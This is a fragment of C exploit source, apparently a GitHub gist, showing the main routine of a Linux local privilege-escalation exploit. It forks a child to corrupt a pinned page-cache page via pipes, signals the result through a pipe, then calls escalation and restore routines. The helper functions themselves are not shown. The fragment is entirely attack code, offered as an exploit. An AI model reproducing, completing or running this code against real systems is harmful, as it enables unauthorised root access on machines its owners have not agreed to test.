close(wait_pipe[1]);
_exit(do_corrupt(done_pipe[1], wait_pipe[0]) == 0 ? 0 : 1);
}
close(done_pipe[1]);
close(wait_pipe[0]);
/* Wait for child to signal corruption result */
char result[4] = {0};
ssize_t rn = read(done_pipe[0], result, sizeof(result));
close(done_pipe[0]);
if (rn < 2 || result[0] != 'O') {
fprintf(stderr, "[-] exploit failed, restoring...\n");
(void)!write(wait_pipe[1], "X", 1);
close(wait_pipe[1]);
waitpid(exploit_pid, NULL, 0);
do_restore();
return 1;
}
/* Child holds pipe_B open — escalate while page cache page is pinned */
do_escalate();
/* Tell child it can exit now (closes pipe_B) */
(void)!write(wait_pipe[1], "X", 1);
close(wait_pipe[1]);
waitpid(exploit_pid, NULL, 0);
do_restore();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment